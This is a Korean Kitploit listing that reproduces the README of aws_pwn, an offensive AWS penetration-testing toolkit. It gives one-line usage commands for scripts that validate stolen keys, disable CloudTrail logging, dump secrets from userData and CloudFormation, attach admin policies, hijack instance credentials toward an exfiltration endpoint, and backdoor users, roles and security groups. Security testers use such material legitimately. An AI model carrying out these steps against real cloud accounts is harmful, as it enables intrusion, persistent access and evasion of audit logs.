Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
aws_pwn — AWS 침투 테스트 관련 자료 모음 | Kitploit
도구/GitHubGitHub/dagrz/aws_pwn
Cloud Infrastructure SecurityPrivilege EscalationReconnaissancePersistence MechanismsExploitationData ExfiltrationPost-ExploitationPenetration TestingCloud Security
GitHubdagrz/aws_pwn

aws_pwn

AWS 침투 테스트 관련 자료 모음

1.2k1928년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

AWS pwn

요약

이것은 AWS 침투 테스트와 관련된 다양한 작업을 수행하기 위해 끔찍하게 작성된 스크립트 모음입니다. 작동하지 않더라도 슬퍼하지 마세요. 특정 도구가 작성된 이후 AWS가 변경되었거나 코드가 별로일 수 있습니다. 어쨌든 기여해 주시기 바랍니다.

이 쓰레기 대부분은 Daniel Grzelak이 작성했지만 많은 기여가 있었으며, 특히 Mike Fuller의 기여가 두드러집니다.

요구 사항

root@kitploit:~
pip install -r requirements.txt

또한 ~/.aws/credentials에 AWS 자격 증명을 설정해야 합니다.

정찰

침투 전 정보 수집 관련 작업.

  • validate_iam_access_keys.py - 액세스 키 + 시크릿 [+ 세션] 조합이 포함된 TSV 파일을 입력받아 액세스 유효성을 확인하고 주체의 식별 정보를 반환합니다.
root@kitploit:~
./validate_iam_access_keys.py -i /tmp/keys.txt -o /tmp/out.json
  • validate_s3_buckets.py - 한 줄에 한 단어씩 있는 텍스트 파일을 입력받아 버킷이 존재하는지 확인하고 기본 식별 정보를 반환합니다.
root@kitploit:~
./validate_s3_buckets.py -i /tmp/words.txt -o /tmp/out.json
  • validate_iam_principals.py - 주체(예: user/admin, role/deploy) 목록이 포함된 텍스트 파일을 입력받아 해당 주체가 특정 계정에 존재하는지 확인합니다.
root@kitploit:~
./validate_iam_principals.py -a 123456789012 -i /tmp/words.txt -o /tmp/out.json
  • validate_accounts.py - 계정 ID와 계정 별칭이 포함된 텍스트 파일을 입력받아 계정이 존재하는지 확인합니다.
root@kitploit:~
./validate_accounts.py -i /tmp/accounts.txt -o /tmp/out.json

익스플로잇

계정에 발판을 마련하는 데 도움이 되는 것들.

은밀성

계정을 손상시킨 후 숨는 데 도움이 될 수 있는 것들.

  • disrupt_cloudtrail.py - 지정된 방식으로 CloudTrail 로깅을 방해/무력화하려고 시도합니다.
root@kitploit:~
./disrupt_cloudtrail.py -s

탐색

침투한 내용을 이해하는 데 도움이 되는 것들.

  • dump_account_data.sh - 여러 일반 계정 기반 read/list/get/describe 함수를 호출하고 데이터를 지정된 위치에 저장합니다. 매우 시끄럽지만 특정 시점의 스냅샷에는 유용합니다.
root@kitploit:~
./dump_account_data.sh /tmp/

권한 상승

계정 내에서 이동하고 다양한 수준의 액세스 권한을 수집하는 데 도움이 되는 것들.

  • dump_instance_attributes.py - 계정의 모든 EC2 인스턴스를 순회하며 지정된 인스턴스 속성을 검색합니다. 가장 일반적으로는 비밀을 포함하는 경향이 있는 userData를 검색하는 데 사용됩니다.
root@kitploit:~
./dump_instance_attributes.py -u -o /tmp/
  • dump_cloudformation_stack_descriptions.py - 기존의 모든 스택과 지난 90일 이내에 삭제된 모든 스택의 스택 설명을 검색합니다. 스택 설명의 파라미터에는 종종 암호 및 기타 비밀이 포함됩니다.
root@kitploit:~
./dump_cloudformation_stack_descriptions.py -o /tmp/data
  • assume_roles.py - 파일에 있거나 list-roles API에서 제공하는 모든 역할(ARN)을 수임하려고 시도합니다.
root@kitploit:~
./assume_roles.py -o /tmp/out.json
  • add_iam_policy - 지정된 사용자, 역할 또는 그룹에 관리자 및 모든 작업 정책을 추가합니다. IAM putPolicy 또는 attachPolicy 권한이 필요합니다.
root@kitploit:~
./add_iam_policy.py -u myuser -r myrole -g mygroup
  • bouncy_bouncy_cloudy_cloud - 지정된 EC2 인스턴스를 재부팅하고 userData를 다시 작성하여 임의 코드를 실행하거나 임시 인스턴스 프로파일 자격 증명을 도용할 수 있도록 합니다.
root@kitploit:~
./bouncy_bouncy_cloudy_cloud.py -i instance-id -e exfiltration-endpoint

지속성

계정에 대한 액세스를 유지하는 데 도움이 되는 것들.

  • rabbit_lambda - 사용자 삭제 이벤트에 응답하여 삭제된 사용자의 복사본을 더 많이 생성하는 Lambda 함수 예제.
  • cli_lambda - AWS CLI 프록시 역할을 하며 자격 증명이 필요하지 않은 Lambda 함수.
  • backdoor_created_users_lambda - 새로 생성된 각 사용자에게 액세스 키를 추가하는 Lambda 함수.
  • backdoor_created_roles_lambda - 새로 생성된 각 역할에 신뢰 관계를 추가하는 Lambda 함수.
  • backdoor_created_security_groups_lambda - 새로 생성된 각 보안 그룹에 지정된 인바운드 액세스 규칙을 추가하는 Lambda 함수.
  • backdoor_all_users.py - 계정의 모든 사용자에게 액세스 키를 추가합니다.
  • backdoor_all_roles.py - 계정의 각 역할에 신뢰 관계를 추가합니다. 역할 ARN을 설정하려면 파일을 편집해야 합니다.
  • backdoor_all_security_groups.py - 계정의 각 보안 그룹에 지정된 인바운드 액세스 규칙을 추가합니다. 규칙을 설정하려면 파일을 편집해야 합니다.

데이터 유출

AWS 방식으로 데이터를 추출하고 이동하는 데 도움이 되는 것들.

  • dynamodump - https://github.com/bchew/dynamodump

기타

분류하기에는 너무 어리석거나 너무 게을러서 남겨둔 것들.

  • reserved_words.txt - AWS에서 특별한 의미를 가지거나 곧 특별한 의미를 가질 가능성이 있는 단어/토큰 목록.
  • endpoints.txt - AWS에서 노출하는 API 엔드포인트의 다소 최신 목록.
  • integrations.txt - 역할이나 액세스 키를 통해 AWS와 통합되는 서비스와 해당 계정 ID, 기본 사용자 이름 등의 TSV 파일.
  • download_docs.sh - 모든 AWS 문서를 wget으로 다운로드하는 명령줄 (매번 다시 하는 것이 어리석고 시간 낭비이기 때문).

할 일

  • 지속성을 위해 사용자에게 비밀번호 추가
  • 스택 리소스 덤프
  • MFA 검증
  • dump_account_data에 더 많은 호출 추가
  • 더 많은 로그 방해 방법 추가
  • CloudTrail에서 유용한 정보를 추출하는 CloudTrail 파싱 스크립트 생성
  • S3 버킷 권한 열거 도구 생성
  • 디스크의 일반적인 위치에서 AWS 자격 증명을 가져오는 도구 생성
  • 복제 도구 생성
  • passrole을 사용하는 어리석은 권한 상승 도구 생성
  • 큐 검증
  • 알림 주제 검증
  • 지속성 스크립트가 내부 상수 대신 인수를 사용하도록 수정
도구 다운로드